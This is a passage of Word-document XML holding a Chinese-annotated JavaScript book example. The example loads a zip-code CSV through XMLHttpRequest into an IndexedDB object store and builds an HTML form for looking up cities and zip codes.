    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>同时，使用城市名来创建索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个对象存储区，并为该存储区指定一个名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>同时也为包含指定该存储区中键字段属性名的键路径的一个可选对象指定名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>（如果省略键路径，</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>会定义它自己的唯一的整型键）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> store=db.createObjectStore("zipcodes",//</w:t>
      </w:r>
      <w:r>
        <w:t>存储区名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{keyPath:"zipcode"});//</w:t>
      </w:r>
      <w:r>
        <w:t>通过城市名以及邮政编码来索引对象存储区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用此方法，表示键路径的字符串要直接传递过去，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且是作为必需的参数而不是可选对象的一部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>store.createIndex("cities","city");//</w:t>
      </w:r>
      <w:r>
        <w:t>现在，需要下载邮政编码数据，将它们解析成对象，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并将这些对象存储到之前创建的对象存储区中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>包含原始数据的文件内容格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//02130,Jamaica Plain,MA,42.309998,-71.11171</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//02131,Roslindale,MA,42.284678,-71.13052</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//02132,West Roxbury,MA,42.279432,-71.1598</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//02133,Boston,MA,42.338947,-70.919635</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//02134,Allston,MA,42.355147,-71.13164</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>令人吃惊的是，美国邮政服务居然没有将这些数据开放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此，这里使用了统计出来的过期的</w:t>
      </w:r>
      <w:r>
        <w:t>邮政编码数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这些数据均来自</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//http://mappinghacks.com/2008/04/28/civicspace-zip-code-database/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>下载这些数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但在获取到数据后，使用新的</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2 onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件和</w:t>
      </w:r>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
      <w:r>
        <w:t>事件来处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>下载数据所需的</w:t>
      </w:r>
      <w:r>
        <w:t>XHR</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open("GET","zipcodes.csv");//</w:t>
      </w:r>
      <w:r>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>方法获取此</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>hr.send();//</w:t>
      </w:r>
      <w:r>
        <w:t>直接获取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.onerror=status;//</w:t>
      </w:r>
      <w:r>
        <w:t>显示错误状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lastChar=0,numlines=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>已经处理的数量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获取数据后，批量处理数据库文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.onprogress=xhr.onload=function(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>一个函数同时作为两个事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在接收数据的</w:t>
      </w:r>
      <w:r>
        <w:t>lastChar</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>lastNewline</w:t>
      </w:r>
      <w:r>
        <w:t>之间处理数据块（需要查询</w:t>
      </w:r>
      <w:r>
        <w:t>newlines</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此不需要处理部分记录项）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lastNewline=xhr.responseText.l</w:t>
      </w:r>
      <w:r>
        <w:t>astIndexOf("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(lastNewline</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>lastChar){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var chunk=xhr.responseText.substring(lastChar,lastNewline)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>lastChar=lastNewline+1;//</w:t>
      </w:r>
      <w:r>
        <w:t>记录下次从哪里开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将新的数据块分割成单独的行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lines=chunk.split("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>numlines+=lines.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>为了将邮政编码数据库存储到数据库中，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里需要事务对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在该此函数返回，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器返回事件循环时，向数据库提交所有使用该对象进行的所有数据库插入操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要创建事务对象，需要指定要使用的对象存储区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且告诉该对象存储区，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>需要对数据库进行写操作而不只是读操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var transaction=db.transaction(["zipcodes"],//</w:t>
      </w:r>
      <w:r>
        <w:t>对象存储区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>IDBTransaction.READ_WRITE);//</w:t>
      </w:r>
      <w:r>
        <w:t>从事务中获取对象存储区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var store=transaction.objectStore("zipcodes");//</w:t>
      </w:r>
      <w:r>
        <w:t>现在，循环邮政编码文件中的每行数</w:t>
      </w:r>
      <w:r>
        <w:t>据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>为它们创建相应的对象，并将对象添加到对象存储区中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>lines.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fields=lines[i].split(",");//</w:t>
      </w:r>
      <w:r>
        <w:t>以逗号分割的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var record={//</w:t>
      </w:r>
      <w:r>
        <w:t>要存储的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>zipcode:fields[0],//</w:t>
      </w:r>
      <w:r>
        <w:t>所有属性都是字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>city:fields[1],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>state:fields[2],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>latitude:fields[3],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>longitude:fields[4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">};//IndexedDB </w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>最好的部分就是对象存储区</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>真的</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>非常简单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>下面就是在数据库中添加一条记录的方式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>store.put(record);//</w:t>
      </w:r>
      <w:r>
        <w:t>或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法避免覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Initializing zipcode database:loaded"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>+numlines+"records.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.type=="load"){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果这是最后的载入事件，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>就将所有的邮政编码数据发送给数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但是，由于刚刚处理了</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>万条数据，可能它还在处理中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此这里做个简单的查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当此查询成功时，就能够得知数据库已经就绪了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后就可以将状态条移除，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>最后调用此前传递给</w:t>
      </w:r>
      <w:r>
        <w:t>withDB()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>lookupCity("02134",function(s){//</w:t>
      </w:r>
      <w:r>
        <w:t>奥尔斯顿</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>马萨诸塞州</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.removeChild(statusline);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>withDB(f);</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/head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Enter a zip code to find its city:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Zipcode:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input o</w:t>
      </w:r>
      <w:r>
        <w:t>nchange="displayCity(this.value)"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/input</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>City:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>output id="city"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/output</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Enter a city name(case sensitive,without state)to find cities and their zipcodes:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>City:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input onchange="displayZipcodes(this.value)"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/input</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div id="zipcodes"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>This example is only known to work in Firefox 4 and Chrome 11.</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Your first query may take a very long time to complete.</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
